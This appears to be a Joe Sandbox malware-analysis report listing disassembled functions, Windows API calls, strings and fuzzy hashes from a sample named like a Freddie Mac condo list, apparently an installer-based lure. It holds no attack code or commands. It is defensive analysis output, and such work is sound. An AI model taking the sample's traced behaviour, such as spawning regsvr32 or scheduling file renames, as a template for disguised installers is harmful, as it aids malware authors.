Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079

Strings

en-US,en,, xrefs: 0040DFBE, 0040E065

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF

Uniqueness

Uniqueness Score: -1.00%

Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E

Strings

.DEFAULT\Control Panel\International, xrefs: 005C8045
GetUserDefaultUILanguage, xrefs: 005C8011
kernel32.dll, xrefs: 005C8016
Control Panel\Desktop\ResourceLocale, xrefs: 005C807D
Locale, xrefs: 005C805D

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755

Uniqueness

Uniqueness Score: -1.00%

Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6

Strings

regsvr32.exe", xrefs: 00624BF7
/u, xrefs: 00624C12
CreateProcess, xrefs: 00624CB8
/s ", xrefs: 00624C1F
Spawning 64-bit RegSvr32: , xrefs: 00624C41
0x%x, xrefs: 00624CE9
D, xrefs: 00624C7C
Spawning 32-bit RegSvr32: , xrefs: 00624C5B

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336

Strings

<T@, xrefs: 00406300, 0040630B

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite
String ID: <T@
API String ID: 3320372497-2050694182
Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E

Uniqueness

Uniqueness Score: -1.00%

Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 005B83B6
IsWindowUnicode.USER32(00000000), ref: 005B83F9
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765

Uniqueness

Uniqueness Score: -1.00%

Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88

Uniqueness

Uniqueness Score: -1.00%

Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B

Strings

,hm, xrefs: 00615AA9, 00615AF3
Cannot evaluate variable because [Code] isn't running yet, xrefs: 00615AB3

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: MessagePostWindow$ForegroundProc
String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
API String ID: 602442252-4088602279
Opcode ID: 45c3d4c65d1ec2b60b52e47b4900782b425ab5755711cce607cb4ac74d550e22
Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
Opcode Fuzzy Hash: 45c3d4c65d1ec2b60b52e47b4900782b425ab5755711cce607cb4ac74d550e22
Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996

Strings

.tmp, xrefs: 0060D952
MoveFileEx, xrefs: 0060DBA0
WININIT.INI, xrefs: 0060D944
NUL, xrefs: 0060DA59
[rename], xrefs: 0060D9FA, 0060DA36

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-3304407042
Opcode ID: 705ed7cc5398cbe28157da632e506f3351768adff860ab0ed1cfb64a8e1f6eff
Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
Opcode Fuzzy Hash: 705ed7cc5398cbe28157da632e506f3351768adff860ab0ed1cfb64a8e1f6eff
Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB

GetTickCount.KERNEL32 ref: 00408E4F
GetTickCount.KERNEL32 ref: 00408E67
GetCurrentThreadId.KERNEL32 ref: 00408E96
GetTickCount.KERNEL32 ref: 00408EC1
GetTickCount.KERNEL32 ref: 00408EF8
GetTickCount.KERNEL32 ref: 00408F22
GetCurrentThreadId.KERNEL32 ref: 00408F92

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A

Uniqueness

Uniqueness Score: -1.00%

Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 005B8604
IsWindowUnicode.USER32 ref: 005B8618
PeekMessageW.USER32 ref: 005B863B
PeekMessageA.USER32 ref: 005B8651
TranslateMessage.USER32 ref: 005B86D6
DispatchMessageW.USER32 ref: 005B86E3
DispatchMessageA.USER32 ref: 005B86EB

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E

Uniqueness

Uniqueness Score: -1.00%

Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
CloseHandle.KERNEL32(00000000), ref: 006A5F91

Strings

GetFinalPathNameByHandleW, xrefs: 006A5F26
kernel32.dll, xrefs: 006A5F2B

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandle$AttributesCloseCreateModule
String ID: GetFinalPathNameByHandleW$kernel32.dll
API String ID: 791737717-340263132
Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
